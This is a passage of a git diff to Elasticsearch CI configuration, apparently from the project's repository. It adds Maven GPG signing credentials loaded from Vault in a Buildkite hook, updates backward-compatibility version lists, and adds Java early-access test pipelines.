diff --git a/.backportrc.json b/.backportrc.json index 31698460c2827..1d54b9c2b9264 100644 --- a/.backportrc.json +++ b/.backportrc.json @@ -1,9 +1,9 @@ { "upstream" : "elastic/elasticsearch", - "targetBranchChoices" : [ "main", "9.0", "8.19", "8.18", "8.17", "8.16", "8.15", "8.14", "8.13", "8.12", "8.11", "8.10", "8.9", "8.8", "8.7", "8.6", "8.5", "8.4", "8.3", "8.2", "8.1", "8.0", "7.17", "6.8" ], + "targetBranchChoices" : [ "main", "9.1", "9.0", "8.19", "8.18", "8.17", "8.16", "8.15", "8.14", "8.13", "8.12", "8.11", "8.10", "8.9", "8.8", "8.7", "8.6", "8.5", "8.4", "8.3", "8.2", "8.1", "8.0", "7.17", "6.8" ], "targetPRLabels" : [ "backport" ], "branchLabelMapping" : { - "^v9.1.0$" : "main", + "^v9.1.4$" : "main", "^v(\\d+).(\\d+).\\d+(?:-(?:alpha|beta|rc)\\d+)?$" : "$1.$2" } } \ No newline at end of file diff --git a/.buildkite/hooks/pre-command b/.buildkite/hooks/pre-command index 34d614c7f7a5e..e6b7b1bc3a199 100644 --- a/.buildkite/hooks/pre-command +++ b/.buildkite/hooks/pre-command @@ -64,6 +64,14 @@ if [[ "${USE_LUCENE_SNAPSHOT_CREDS:-}" == "true" ]]; then unset data fi +if [[ "${USE_MAVEN_GPG:-}" == "true" ]]; then + vault_path="kv/ci-shared/release-eng/team-release-secrets/es-delivery/gpg" + ORG_GRADLE_PROJECT_signingKey=$(vault kv get --field="private_key" $vault_path) + ORG_GRADLE_PROJECT_signingPassword=$(vault kv get --field="passphase" $vault_path) + export ORG_GRADLE_PROJECT_signingKey + export ORG_GRADLE_PROJECT_signingPassword +fi + if [[ "${USE_DRA_CREDENTIALS:-}" == "true" ]]; then DRA_VAULT_ROLE_ID_SECRET=$(vault read -field=role-id secret/ci/elastic-elasticsearch/legacy-vault-credentials) export DRA_VAULT_ROLE_ID_SECRET diff --git a/.buildkite/pipelines/dra-workflow.yml b/.buildkite/pipelines/dra-workflow.yml index 36828a6512db8..43a3ff73b9654 100644 --- a/.buildkite/pipelines/dra-workflow.yml +++ b/.buildkite/pipelines/dra-workflow.yml @@ -2,6 +2,7 @@ steps: - command: .buildkite/scripts/dra-workflow.sh env: USE_DRA_CREDENTIALS: "true" + USE_MAVEN_GPG: "true" USE_PROD_DOCKER_CREDENTIALS: "true" agents: provider: gcp diff --git a/.buildkite/pipelines/intake.yml b/.buildkite/pipelines/intake.yml index 93c5c8eecc3fb..1dcba9dd55e55 100644 --- a/.buildkite/pipelines/intake.yml +++ b/.buildkite/pipelines/intake.yml @@ -65,7 +65,7 @@ steps: timeout_in_minutes: 300 matrix: setup: - BWC_VERSION: ["8.17.9", "8.18.4", "8.19.0", "9.0.4", "9.1.0"] + BWC_VERSION: ["8.18.7", "8.19.4", "9.0.7", "9.1.4"] agents: provider: gcp image: family/elasticsearch-ubuntu-2404 diff --git a/.buildkite/pipelines/periodic-fwc.template.yml b/.buildkite/pipelines/periodic-fwc.template.yml index 5154ef36aaacc..c78d3a24a7743 100644 --- a/.buildkite/pipelines/periodic-fwc.template.yml +++ b/.buildkite/pipelines/periodic-fwc.template.yml @@ -1,6 +1,6 @@ steps: - - label: $FWC_VERSION / fwc - command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v$FWC_VERSION#fwcTest -Dtests.bwc.snapshot=false + - label: "{{matrix.FWC_VERSION}} / fwc" + command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v$$FWC_VERSION#fwcTest -Dtests.bwc.snapshot=false timeout_in_minutes: 300 agents: provider: gcp @@ -11,4 +11,4 @@ steps: setup: FWC_VERSION: $FWC_LIST env: - FWC_VERSION: $FWC_VERSION + FWC_VERSION: "{{matrix.FWC_VERSION}}" diff --git a/.buildkite/pipelines/periodic-fwc.yml b/.buildkite/pipelines/periodic-fwc.yml index f17ee5574e6e7..561dbca493bb1 100644 --- a/.buildkite/pipelines/periodic-fwc.yml +++ b/.buildkite/pipelines/periodic-fwc.yml @@ -1,7 +1,7 @@ # This file is auto-generated. 
See .buildkite/pipelines/periodic-fwc.template.yml steps: - - label: $FWC_VERSION / fwc - command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v$FWC_VERSION#fwcTest -Dtests.bwc.snapshot=false + - label: "{{matrix.FWC_VERSION}} / fwc" + command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v$$FWC_VERSION#fwcTest -Dtests.bwc.snapshot=false timeout_in_minutes: 300 agents: provider: gcp @@ -10,6 +10,6 @@ steps: buildDirectory: /dev/shm/bk matrix: setup: - FWC_VERSION: [] + FWC_VERSION: ["9.1.0", "9.1.1", "9.1.2", "9.1.3"] env: - FWC_VERSION: $FWC_VERSION + FWC_VERSION: "{{matrix.FWC_VERSION}}" diff --git a/.buildkite/pipelines/periodic-java-ea.bwc.template.yml b/.buildkite/pipelines/periodic-java-ea.bwc.template.yml new file mode 100644 index 0000000000000..0cd254267192e --- /dev/null +++ b/.buildkite/pipelines/periodic-java-ea.bwc.template.yml @@ -0,0 +1,18 @@ + - label: $BWC_VERSION / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=\$\$JAVA_EA_VERSION -Dbwc.checkout.align=true v$BWC_VERSION#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: $BWC_VERSION + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 diff --git a/.buildkite/pipelines/periodic-java-ea.template.yml b/.buildkite/pipelines/periodic-java-ea.template.yml new file mode 100644 index 0000000000000..088c4cd2c8af3 --- /dev/null +++ b/.buildkite/pipelines/periodic-java-ea.template.yml @@ -0,0 +1,183 @@ +env: + JAVA_EA_VERSION: "${JAVA_EA_VERSION:-25-pre}" + +steps: + - group: bwc + steps: $BWC_STEPS + - label: concurrent-search-tests + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true -Dtests.jvm.argline=-Des.concurrent_search=true -Des.concurrent_search=true functionalTests + timeout_in_minutes: 420 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + diskSizeGb: 350 + machineType: custom-32-98304 + - label: encryption-at-rest + command: .buildkite/scripts/encryption-at-rest.sh -Druntime.java=$$JAVA_EA_VERSION + timeout_in_minutes: 420 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + diskSizeGb: 350 + machineType: custom-32-98304 + - label: eql-correctness + command: .buildkite/scripts/eql-correctness.sh -Druntime.java=$$JAVA_EA_VERSION + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: custom-32-98304 + buildDirectory: /dev/shm/bk + - group: java-matrix + steps: + - label: "{{matrix.GRADLE_TASK}} / java-ea" + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true $$GRADLE_TASK + timeout_in_minutes: 300 + matrix: + setup: + image: + - windows-2025 + - ubuntu-2404 + GRADLE_TASK: + - checkPart1 + - checkPart2 + - checkPart3 + - checkPart4 + - checkPart5 + - checkPart6 + - checkRestCompat + agents: + provider: gcp + image: family/elasticsearch-{{matrix.image}} + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + env: + GRADLE_TASK: "{{matrix.GRADLE_TASK}}" + - label: "{{matrix.BWC_VERSION}} / matrix-bwc" + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v$$BWC_VERSION#bwcTest + timeout_in_minutes: 300 + matrix: + setup: + BWC_VERSION: $BWC_LIST + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: 
/dev/shm/bk + env: + BWC_VERSION: "{{matrix.BWC_VERSION}}" + - label: release-tests + command: .buildkite/scripts/release-tests.sh + timeout_in_minutes: 360 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + diskSizeGb: 350 + machineType: custom-32-98304 + - label: single-processor-node-tests + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true -Dtests.configure_test_clusters_with_one_processor=true functionalTests + timeout_in_minutes: 420 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + diskSizeGb: 350 + machineType: custom-32-98304 + - group: third-party tests + steps: + - label: third-party / azure-sas + command: | + export azure_storage_container=elasticsearch-ci-thirdparty-sas + export azure_storage_base_path=$BUILDKITE_BRANCH + + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION azureThirdPartyTest + env: + USE_3RD_PARTY_AZURE_SAS_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / azure + command: | + export azure_storage_container=elasticsearch-ci-thirdparty + export azure_storage_base_path=$BUILDKITE_BRANCH + + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION azureThirdPartyTest + env: + USE_3RD_PARTY_AZURE_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / gcs + command: | + export google_storage_bucket=elasticsearch-ci-thirdparty + export google_storage_base_path=$BUILDKITE_BRANCH + + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION gcsThirdPartyTest + env: + USE_3RD_PARTY_GCS_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / geoip + command: | + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION :modules:ingest-geoip:internalClusterTest -Dtests.jvm.argline="-Dgeoip_use_service=true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / s3 + command: | + export amazon_s3_bucket=elasticsearch-ci.us-west-2 + export amazon_s3_base_path=$BUILDKITE_BRANCH + + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION s3ThirdPartyTest + env: + USE_3RD_PARTY_S3_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / ms-graph + command: | + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION msGraphThirdPartyTest + env: + USE_3RD_PARTY_MS_GRAPH_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - group: lucene-compat + steps: + - label: "{{matrix.LUCENE_VERSION}} / lucene-compat" + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true -Dorg.elasticsearch.build.cache.push=true -Dignore.tests.seed -Dscan.capture-file-fingerprints -Dtests.bwc.main.version=$$ES_VERSION -Dtests.bwc.refspec.main=$$ES_COMMIT luceneBwcTest + timeout_in_minutes: 300 + matrix: + setup: + LUCENE_VERSION: + - "10.0.0" + ES_VERSION: + - 
"9.0.0" + ES_COMMIT: + - "10352e57d85505984582616e1e38530d3ec6ca59" # update to match last commit before lucene bump maintained from combat-lucene-10-0-0 branch + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: custom-32-98304 + buildDirectory: /dev/shm/bk + env: + ES_VERSION: "{{matrix.ES_VERSION}}" + ES_COMMIT: "{{matrix.ES_COMMIT}}" diff --git a/.buildkite/pipelines/periodic-java-ea.yml b/.buildkite/pipelines/periodic-java-ea.yml new file mode 100644 index 0000000000000..b40f7dbc157f2 --- /dev/null +++ b/.buildkite/pipelines/periodic-java-ea.yml @@ -0,0 +1,621 @@ +# This file is auto-generated. See .buildkite/pipelines/periodic-java-ea.template.yml +env: + JAVA_EA_VERSION: "${JAVA_EA_VERSION:-25-pre}" + +steps: + - group: bwc + steps: + - label: 8.0.1 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.0.1#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.0.1 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.1.3 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.1.3#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.1.3 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.2.3 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.2.3#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.2.3 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.3.3 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.3.3#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.3.3 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.4.3 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.4.3#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.4.3 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.5.3 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.5.3#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.5.3 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.6.2 / bwc + command: 
.ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.6.2#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.6.2 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.7.1 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.7.1#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.7.1 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.8.2 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.8.2#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.8.2 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.9.2 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.9.2#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.9.2 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.10.4 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.10.4#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.10.4 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.11.4 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.11.4#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.11.4 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.12.2 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.12.2#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.12.2 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.13.4 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.13.4#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.13.4 + retry: + automatic: + - exit_status: "-1" + 
limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.14.3 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.14.3#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.14.3 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.15.5 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.15.5#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.15.5 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.16.6 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.16.6#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.16.6 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.17.10 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.17.10#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.17.10 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.18.7 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.18.7#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.18.7 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.19.4 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.19.4#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.19.4 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 9.0.7 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v9.0.7#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 9.0.7 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 9.1.4 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v9.1.4#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + 
buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 9.1.4 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 9.2.0 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v9.2.0#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 9.2.0 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: concurrent-search-tests + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true -Dtests.jvm.argline=-Des.concurrent_search=true -Des.concurrent_search=true functionalTests + timeout_in_minutes: 420 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + diskSizeGb: 350 + machineType: custom-32-98304 + - label: encryption-at-rest + command: .buildkite/scripts/encryption-at-rest.sh -Druntime.java=$$JAVA_EA_VERSION + timeout_in_minutes: 420 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + diskSizeGb: 350 + machineType: custom-32-98304 + - label: eql-correctness + command: .buildkite/scripts/eql-correctness.sh -Druntime.java=$$JAVA_EA_VERSION + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: custom-32-98304 + buildDirectory: /dev/shm/bk + - group: java-matrix + steps: + - label: "{{matrix.GRADLE_TASK}} / java-ea" + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true $$GRADLE_TASK + timeout_in_minutes: 300 + matrix: + setup: + image: + - windows-2025 + - ubuntu-2404 + GRADLE_TASK: + - checkPart1 + - checkPart2 + - checkPart3 + - checkPart4 + - checkPart5 + - checkPart6 + - checkRestCompat + agents: + provider: gcp + image: family/elasticsearch-{{matrix.image}} + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + env: + GRADLE_TASK: "{{matrix.GRADLE_TASK}}" + - label: "{{matrix.BWC_VERSION}} / matrix-bwc" + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v$$BWC_VERSION#bwcTest + timeout_in_minutes: 300 + matrix: + setup: + BWC_VERSION: ["8.18.7", "8.19.4", "9.0.7", "9.1.4", "9.2.0"] + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + env: + BWC_VERSION: "{{matrix.BWC_VERSION}}" + - label: release-tests + command: .buildkite/scripts/release-tests.sh + timeout_in_minutes: 360 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + diskSizeGb: 350 + machineType: custom-32-98304 + - label: single-processor-node-tests + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true -Dtests.configure_test_clusters_with_one_processor=true functionalTests + timeout_in_minutes: 420 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + diskSizeGb: 350 + machineType: custom-32-98304 + - group: third-party tests + steps: + - label: third-party / azure-sas + command: | + export azure_storage_container=elasticsearch-ci-thirdparty-sas + export azure_storage_base_path=$BUILDKITE_BRANCH + + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION azureThirdPartyTest + env: + USE_3RD_PARTY_AZURE_SAS_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: 
family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / azure + command: | + export azure_storage_container=elasticsearch-ci-thirdparty + export azure_storage_base_path=$BUILDKITE_BRANCH + + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION azureThirdPartyTest + env: + USE_3RD_PARTY_AZURE_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / gcs + command: | + export google_storage_bucket=elasticsearch-ci-thirdparty + export google_storage_base_path=$BUILDKITE_BRANCH + + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION gcsThirdPartyTest + env: + USE_3RD_PARTY_GCS_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / geoip + command: | + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION :modules:ingest-geoip:internalClusterTest -Dtests.jvm.argline="-Dgeoip_use_service=true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / s3 + command: | + export amazon_s3_bucket=elasticsearch-ci.us-west-2 + export amazon_s3_base_path=$BUILDKITE_BRANCH + + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION s3ThirdPartyTest + env: + USE_3RD_PARTY_S3_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / ms-graph + command: | + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION msGraphThirdPartyTest + env: + USE_3RD_PARTY_MS_GRAPH_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - group: lucene-compat + steps: + - label: "{{matrix.LUCENE_VERSION}} / lucene-compat" + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true -Dorg.elasticsearch.build.cache.push=true -Dignore.tests.seed -Dscan.capture-file-fingerprints -Dtests.bwc.main.version=$$ES_VERSION -Dtests.bwc.refspec.main=$$ES_COMMIT luceneBwcTest + timeout_in_minutes: 300 + matrix: + setup: + LUCENE_VERSION: + - "10.0.0" + ES_VERSION: + - "9.0.0" + ES_COMMIT: + - "10352e57d85505984582616e1e38530d3ec6ca59" # update to match last commit before lucene bump maintained from combat-lucene-10-0-0 branch + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: custom-32-98304 + buildDirectory: /dev/shm/bk + env: + ES_VERSION: "{{matrix.ES_VERSION}}" + ES_COMMIT: "{{matrix.ES_COMMIT}}" diff --git a/.buildkite/pipelines/periodic-packaging.yml b/.buildkite/pipelines/periodic-packaging.yml index cac74ac6ebaae..42922ac65924b 100644 --- a/.buildkite/pipelines/periodic-packaging.yml +++ b/.buildkite/pipelines/periodic-packaging.yml @@ -302,8 +302,8 @@ steps: env: BWC_VERSION: 8.16.6 - - label: "{{matrix.image}} / 